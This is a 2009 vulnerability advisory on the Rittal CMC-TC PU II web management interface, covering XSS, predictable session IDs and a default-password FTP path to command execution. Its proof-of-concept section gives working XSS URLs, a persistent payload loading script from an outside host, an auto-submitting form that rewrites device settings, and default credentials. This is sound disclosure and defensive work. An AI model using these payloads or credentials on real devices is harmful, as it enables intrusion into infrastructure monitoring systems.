-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
Louhi Networks Oy
-= Security Advisory =-
Advisory: Rittal CMC-TC Processing Unit II
multiple vulnerabilities
Release Date: 2009-03-23
Last Modified: 2009-03-22
Authors: Henri Lindberg, CISA
[henri d0t lindberg at louhi d0t fi]
Application: Rittal CMC-TC PU II Web management
Devices: CMC-TC PU II DK 7320.100 SW: V2.45 HW: V3.01,
possibly other Rittal products
Attack type : XSS Type I, XSS Type II, Session prediction,
Remote command execution in default configuration
Severity: Moderate
Vendor Status: Vendor notified.
Patch already available for XSS vulnerabilities.
Other vulnerabilities will be addressed in a future
version, no release date set.
References: http://www.louhinetworks.fi/advisory/Rittal_090323.txt
Overview:
Quote from http://www.rimatrix5.com/ :
"The Computer Multi Control Top-Concept (CMC-TC) from Rittal is
a complete security management for preventive protection to guard
against consequential costs, and is the central organisational unit
for linking to the facility management.
...
Processing Unit II (PU II) the nerve centre of the CMC-TC monitoring
system. The PU II is the coordinator between the sensor unit and the
network. It is configured via the integral Web server."
Details:
Several vulnerabilities were identified from CMC-TC PU II web
interface. These include XSS Type I, XSS Type II, weak session
management and insecure default configuration.
XSS Type 1:
-----------
Web application fails to validate and/or htmlencode user input when
handling erroneous requests. This allows attacker to inject HTML and
client-side scripts to victim's browser by creating suitable links.
This vulnerability cannot be used for session hijacking, because
CMC-TC PU II requires each valid request to contain current session
ID as URL parameter. Requests without session ID are redirected to
the login page. Therefore only phishing-type attacks or attacks
against user's browser are possible.
Successful exploitation requires that attacker can lure or force
the user to follow the malicious link.
XSS Type 2:
-----------
Web application fails to sanitize and/or htmlencode user input on
system information page. This allows attacker to backdoor the device
with HTML and browser interpreted content (such as ECMAscript
dialects or other client-side scripts) as the content is displayed
always after login. Persistent XSS allows attacker to modify
displayed content or to change the victim's password (since old
password is not required for password changes).
Succesful exploitation requires access to the web management
interface either with valid credentials or hijacked session.
Weak session management:
------------------------
CMC-TC PU II uses unixtime from login moment as session identifier,
thus having insufficient randomization.
If administrator login time is known and session is still valid, it
can be brute-forced with relatively little effort. Proof-of-concept
tool is provided, but any web application security tool (such as
Burp Intruder) can be used for this.
Successful exploitation requires that administrator login time is
known (or a reasonably accurate guess can be made) and the session
is still active.
Insecure default configuration:
-------------------------------
If default administrator password is not changed, attacker can run
arbitrary commands and modify the system software by uploading
malicious update scripts via ftp. See update packet script contents
for detailed information about the update process (eg update_l.sh).
Software update packet expects user to have default password
in place, since ftp-upload script contains hardcoded default
password. The update will fail with no errors if it's been changed.
What makes this interesting is the fact that the device does not
offer operating system level access through any of the other
management interfaces. Telnet and SSH both offer a menu based
administration interface.
Successful exploitation requires default administrator password and
access to ftp port of the target device.
Remediation:
* Restrict unauthorized network access to device
* Change default passwords (instructions provided in Operation
Manual)
* Install patched Version 2.60a
* Update future patch version as soon as available
* Configure web interface to 'view only'
* Review device configuration after an administrator has been let go
* Do not follow untrusted links
Timeline:
* 2008-xx-xx Issues discovered
* 2009-02-25 Contacted vendor via e-mail
* 2009-03-02 Contacted vendor via e-mail
* 2009-03-02 Vendor response.
XSS vulnerabilities were already fixed independently.
http://www.rittal.de/downloads/Software/de/CMC_TC/18_update_processing_unit2/PU2_Update_v2.60a.zip
http://www.rittal.de/downloads/Software/en/CMC_TC/12_CMC_TC_Processing_unit/7320100V33e.pdf
Quote from vendor (sic):
"thank you very much by the security information XXS.
We have seen, your customer has check the PUII SW V2.45.
Actual we have a better Version 2.60a with more seyurity.
Our XXS-Check of that Version is OK.
If you has by the basic more information for Rittal,
we are fine to get . "
* 2009-03-02 Contacted vendor via e-mail requesting information about
weak session management and public disclosure of XSS
vulnerabilities.
* 2009-03-02 Discovered issues regarding default configuration from
update packages
* 2009-03-16 Contacted vendor via e-mail requesting information
regarding vulnerabilities and stating intent to release
the advisory
* 2009-03-19 Vendor response. Promises to patch vulnerabilities in a
future version.
* 2009-03-19 Contacted vendor via e-mail requesting release date for
the update.
* 2009-03-20 Vendor response. Release date not set.
* 2009-03-20 Contacted vendor via e-mail stating intent to release
the advisory. Delivered draft version of advisory.
Proof-of-Concept:
0) XSS Type 1 / Reflected
http://cmc.example.com/cmclogin.cgi?Fredo=%3Cscript%3Ealert('You%20broke%20my%20heart.You%20broke%20my%20heart');%3C/script%3E
http://cmc.example.com/cmcget.cgi?46010%3CSCRIPT%3Ealert('I%20know%20it%20was%20you.');%3C/SCRIPT%3E
1) XSS Type 2 / Persistent
Setup - General - Location: <script src="http://l7.fi"></script>
1234567890 is the unixtime for administrator's login.
<html>
<head><title>42</title></head>
<body onload="document.backdoor.submit()">
<form ACTION=http://1.1.1.1/cmcget.cgi?630101011234567890 METHOD=POST
name="backdoor">
<input name="p001" value="Initech Datacenter CMC-TC PU #42">
<input name="p002" value="Compton, LA county">
<input name="p003" value="servicedesk_at_initech.cpt">
<input name="p004" value="0">
<input name="p005" value="0">
<input name="p005" value="1">
<input name="p006" value="0">
<input name="p006" value="1">
<input name="p007" value="1">
<input name="p008" value="04.02.2000">
<input name="p009" value="04:20:00">
</form>
</body>
</html>
2) Session prediction
Proof-of-concept brute force tool available at
http://www.louhinetworks.fi/advisory/Louhi_CMC-brute_090323.zip
Other information:
* Default username and password is cmc
* Default administrator username/password is admin
* Device supports following protocols TCP/IP, SNMPv1, SNMPv3, FTP,
SFTP, SMTP, HTTPS, NTP, SSH, PPP, DHCP. Further research is
highly encouraged.
"Six pints of bitter. And quickly please, the world's about to end."
-- Ford Prefect
Copyright 2009 Louhi Networks Oy. All rights reserved. No warranties,
no liabilities, information provided 'as is' for educational purposes.
Reproduction allowed as long as credit is given. Information wants to
be free.
-----BEGIN PGP SIGNATURE-----
iEYEAREIAAYFAknHdIoACgkQ3TZNEGeZkm51ywCgurXjibfo7YnVo4w42652m/9l
BiEAoJcIyGDmjrM0ebS+6ZYL6sniQ+qR
=ic2o
-----END PGP SIGNATURE-----